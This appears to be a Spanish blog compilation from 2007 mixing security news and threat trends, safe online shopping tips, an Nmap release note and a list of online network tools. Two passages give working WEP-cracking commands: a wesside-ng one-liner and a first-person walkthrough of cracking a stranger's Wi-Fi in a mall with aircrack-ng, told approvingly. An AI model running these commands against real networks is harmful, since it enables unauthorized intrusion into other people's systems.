Durante el año que se fue aumentaron los casos de phishing, el uso de marcas conocidas para estafas, el spam con PDF, la fuga de datos, la proliferación de bots, y la subasta para vender información de vulnerabilidades al más alto postor.

El año que terminó esta semana se caracterizó en materia de seguridad informática por 10 tendencias que se agravaron, de acuerdo a la visión de Symantec, la empresa del sector más grande del mundo en volumen de facturación. Aquí, los principales problemas que hubo en el 2007.

Phishing La estafa en línea siguió siendo importante en el 2007 con un incremento de 18 por ciento en el número de sitios únicos detectados en los primeros seis meses del año.

Uso de marcas conocidas
Los atacantes explotaron sitios y ambientes Web de marcas conocidas, lo que generó que las víctimas y usuarios cayeran en sus redes.
Spam
En 2007, el spam alcanzó niveles record y el spam de PDF surgió como una nueva modalidad. El spam que usa tarjetas de felicitación fue el responsable de la distribución del gusano “Storm Worm” (conocido como Peacomm). En los primeros meses de 2007, el 3% de todo el spam detectado en el mundo se originó en América Latina.

Fuga de datos
La fuga de datos de usuarios de alto perfil incrementó la importancia que tienen las tecnologías y estrategias de prevención de pérdida de información (Data Loss).

Seguridad en máquinas virtuales
La virtualización ocupó grandes titulares en el 2007. Pero la industria no ha explorado del todo las implicaciones de seguridad que conlleva la tecnología virtual.

Bots
Los bots continuaron entrando silenciosamente en computadoras desprotegidas realizando actividades maliciosas como envío de spam y captura de datos. El Storm Worm empleó tecnología bot.

A la venta
La compañía Wabi Sabi Labi debutó y creó un sistema de subasta para vender información de vulnerabilidades al más alto postor, generando controversia y discusión sobre la responsabilidad y revelación de información.

Kits para ataques profesionales
El MPack hizo grandes olas durante 2007 y los toolkits (conjuntos de herramientas) vinculados con phishing también fueron populares. 42% de los sitios Web de phishing detectados en la primera mitad del año estuvieron asociados con 3 toolkits.

Vulnerabilidades de web plug-in
Los controles ActiveX, que representaron la mayoría de las vulnerabilidades de plug-ins, generaron amenazas de seguridad que comprometieron la disponibilidad, confidencialidad e integridad de las computadoras vulnerables en todo el mundo

Lanzamiento de Vista
Microsoft Vista llegó al mercado y rápidamente los atacantes encontraron algunos huecos en el sistema. Tan sólo en 2007, Microsoft liberó 16 parches de seguridad para el nuevo sistema operativo.

Fuente del artículo: InfobaeProfesional

La subida de los precios en los últimos meses, las aglomeraciones en los centros comerciales hará que un buen número de ayudantes del viejito pascuero se inclinen por la opción de las compras a través de Internet para realizar sus compras navideñas de una forma cómoda y económica.

No obstante, y dado que cada vez más gente opta por hacer sus compras a través de Internet, el riesgo de que pequeños duendes nos agüen nuestras ilusiones navideñas, y lo que es peor, roben nuestra identidad, es sin duda elevado. Sin ir más lejos, durante el año pasado la Comisión Federal de Comercio de Estados Unidos registró más de 674.000 víctimas de ladrones de identidad, lo que supuso un fraude que se estima en 1.100 millones de dólares en pérdidas.

Algo que nos hace reflexionar y pensar lo importante que es comprar con sumo cuidado en internet.

Expertos en seguridad y privacidad  han identificado ocho claves para que el consumidor pueda realizar sus compras navideñas con total tranquilidad:

1. Conoce al vendedor. Siempre es bueno conocer la reputación de la empresa elegida para la compra. Si el vendedor online no te resulta familiar, asegúrate de buscar en la web sus detalles de contacto, incluyendo una dirección física y un número de teléfono. Además, mira si la página web es miembro de algún programa de marca de confianza o sello de seguridad. Esto certifica que el negocio cumple con todos los estándares de seguridad exigidos por dicho programa.  por que las aperiencias engañan.

2. Asegúrate de que estás comprando en una página web segura. Una página web segura utiliza una tecnología de encriptación que codifica la información que tú, como comprador, envías, tales como el número de la tarjeta de crédito, a fin de prevenir que los ladrones de identidad tengan acceso a la misma mientras viaja a través de la red. La dirección de una web segura incluye “https://” al comienzo de la misma; la “s” es la indicación de que esa web es segura.

Además, debe incluir un candado cerrado en la barra de herramientas de la parte inferior de la pantalla. Si el candado no aparece o aparece abierto, puede ser una señal de que la web no sea segura. Es importante que incluso en una página segura, no se envíe ninguna información financiera más que la que sea necesaria, y, sobre todo, guardar siempre una copia en papel de la transacción para nuestros registros personales.

3. Revisa las políticas de privacidad y seguridad de las empresas a las que vas a comprar a través de Internet. Todas las empresas incluyen en su web la política de privacidad y seguridad. Esto te indicará la información que la empresa necesita para las transacciones, cómo es usada y qué información será compartida con otras empresas. Si estás preocupado por la información que será compartida, asegúrate que existe la opción de mantener tu información en privado y de forma confidencial.

4. Toma medidas para proteger tu seguridad. Instala herramientas de seguridad en tu ordenador, como un buen antivirus, cortafuegos y demás software anti-espía. Los programas y sistemas operativos deben ser continuamente actualizados; ten en cuenta que muchos de los problemas de seguridad en casa son causados por softwares caducados.

5. No uses información personal para contraseñas. Datos como el número de DNI, fechas de nacimientos, nombres, apodos, direcciones de email o números de teléfono son de fácil averiguación, y por lo tanto, no es recomendable emplearlos en las contraseñas. Asegúrate de que tu contraseña contiene como mínimo 8 caracteres, y que es una combinación de letras, números y otros caracteres especiales.

6. Monitoriza tu actividad online con cierta regularidad. Si llevas a cabo compras a través de la red, revisa tus extractos bancarios con regularidad, y si fuera posible, es recomendable utilizar una tarjeta de crédito distinta para las compras y transacciones online. Revisando los recibos, las transacciones y los extractos de la tarjeta de crédito frecuentemente, podrás detectar cualquier robo y minimizar el daño. Los ladrones de identidad suelen utilizar la información robada durante un breve periodo de tiempo para evitar ser descubiertos. Si sospechas de la existencia de una brecha de seguridad, contacta inmediatamente con la empresa con la que se haya realizado la transacción.

7. Sé consciente de que las políticas de seguridad y privacidad internacionales pueden ser distintas. Cuando compras en una tienda española, estás protegido por las leyes de nuestro país. Pero estas leyes no tienen porque ser aplicables en transacciones internacionales. Si no se trata de un vendedor consolidado y existe algún problema, puede ser difícil de resolver. Es recomendable que, inmediatamente después de realizar una compra, se imprima una copia de los términos, condiciones, garantías, descripción del producto, información del vendedor e incluso correos intercambiados con el mismo, y se guarde hasta que sea recibido el producto. Una vez recibido, asegúrate que cumple con todas las características que se decían en el anuncio, contactando con el vendedor tan pronto como sea posible en el caso de haber cualquier incidente.

8. Cuidado con el ‘phishing‘. El ‘phishing’ son los correos electrónicos que simulan proceder del anunciante. En los últimos años se ha convertido en la forma más frecuente de fraude online. Estos emails son en principio de apariencia legítima y se dirigen al cliente mediante su nombre y apellidos, lo que hace que sean más convincentes. Los ladrones envían estos correos con la excusa de verificar ciertos datos, y una vez que se ha pinchando en el enlace, se accede a una web falsa. Una actitud escéptica ante estos emails es la mejor forma de protegerse del fraude, sobre todo si no se han realizado compras con esa empresa con antelación. Ante un email dudoso, es preferible acceder a la web escribiendo nosotros mismos la dirección en el navegador, sin seguir el enlace proporcionado en el email, ya que, de ser verdad lo que se nos comunicaba, tendremos un aviso nada más acceder a la web de forma segura.

Estos son pasos importantes para poder comprar tranquilamtente por internet

Suerte.

fuente: Lafecha.net 

Se trata de wesside-ng esta herramienta permite romper las claves de las redes inalambricas condificadas con  WEP de una forma mucho mas sencilla y totalmente automatica.

wesside-ng selecciona de forma inteligente las redes disponibles que encuentre con este tipo de “seguridad” (WEP) aplicando un ataque especifico a la red y automaticamente reinyectando paquetes, al final obtiene la clave sin ninguna intervension del usuario.

para romper la contraseña solo tenemos que ejecutar

wesside-ng -i wlan0

y automaticamente nos dara la contraseña despues de un tiempo corto (por lo general 1 minuto).

mas informacion en la pagina de aircrack

Click Acá 

Nmap ha cumplido 10 años desde su primera versión publica en 1997 y por esta razón han decidido publicar una versión especial de aniversario la 4.50.

Ya TIENE 10 años el nmap y que todavía funcione de maravilla, de las apariciones del nmap en el cine (ya son 5 las películas) y de las nuevas características que incluye el nmap.

Entre las nuevas (son 320 cambios desde su versión 4.00) características del Nmap podemos encontrar:

• Nueva interfaz gráfica y de los resultados de visualización (Zenmap)
• Motor de scripting que le permite escribir sus propios scripts de alto rendimiento (o utilizar uno de los 40 scripts que estan incluidos)
• La 2 ª generación del sistema de detección OS (ahora con Más de un millar de huellas digitales), casi 1500 más
• Detección de firmas, y mucho más!

Puedes leer la versión completa de los cambios aquí

fuente : www.dragonjar.us

Sentado un dia en el Mall Plaza La Serena, mi laptop empezó a encontrar redes wi-fi como loco y me pregunté si podia hacer para poder romper alguna red WAP no creo … WEP ? sí hehehe!

Y como? Como lo hice?

Simple.

/*Despues de conseguirme una targeta wi-fi externa, por que mi broadcom con ndiswrapper NO ME FUNCIONO! */

Instalé los paquetes necesarios

apt-get install aircrack

cambié la mac de mi lap.

ifconfig wlan0 hw ether 00:11:22:33:44:55

dejé en modo monitor la targeta wi-fi

airmon-ng start wlan0

y ahí me quede pensando un rato…

hahaha luego

buqué la mac del PSEudorouter /*LOL*/

airodump-ng -w wifi wlan0

! entré la mac de ahí cuando la encontré apliqué a

iwconfig wlan0 mode Monitor channel #

# = canal de router

Se establece la comunicación con el router

aireplay-ng -1 0 -e “nombre de la red” -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 wlan0

Esperé unas 200.000 ivs /* habia leido que podian ser de 150.000 , No me meto mucho a la teoria, se pondria latero*/

apliqué a

aircrack-ng wifi-01.cap

Esperé que terminara y de ahí me pude conectar

airodump-ng -w wifi wlan0

Eso seria, Saludos /* TK mi niña */

Vagando por internet, (Que por lo usual es mucho tiempo, pero controlado jejeje)

Me encontre con el siguiente sitio que de manera online pone a disposición herramientas tanto para administradores de red,webmasters, analistas, etc…

tiene las siguientes utilidades:

IP-Tools
TCP-Traceroute
ICMP-Traceroute
UDP-Traceroute
ICMP-Ping
ICMP-Pingrow
IP-Info

Nameserver
NS-Report
Whois
Subdomains
TLS’s
Hostnames on IP
As-Info for IP

Webserver
SSL-Info
Header
Page-Source
Hyperlinks on Page
Comments on Page
robots.txt
File-Search
File-Info

Cryto
Encode Strings
Decode Strings
Checksum Strings
Hash Strings
Cryptography

Other Tools
Browsercheck
File-Info

A esto le faltaria agregarle NMAP Online (http://nmap-online.com/) y tendriamos tremendo recurso Online.

Una “ciberguerra” por tener el control de los computadors en todo el mundo amenaza con convertirse en una de las mayores amenazas para la seguridad en la próxima guerra, según un informe publicado el dia 6 de diciembre.Unos 120 países están desarrollando modos de utilizar Internet como un arma para afectar mercados financieros, sistemas informáticos gubernamentales y recursos, dijo el informe anual de la empresa de seguridad macfee.

Los servicios secretos ya prueban de manera rutinaria las redes de otros estados en búsqueda de puntos débiles, y sus técnicas son más sofisticadas cada año, indicó.

Los gobiernos deben incrementar sus defensas de manera urgente contra el espionaje industrial y los ataques a las infraestructuras.

Si lo ves en algun lado esto quiere decir que te  sientes identificando con la cultura hacker .  Esto que no quiere decir que sea o seas hacker, por que esto se gana con el tiempo es un contaste aprender y tambien depende del punto de vista que uno lo tome o que otros lo miren, te miren o lo mires

Es algo dificil de explicar como casi la mayoria y sin número de cosas, pero cada uno ve las cosas como la quiere ver y las siente.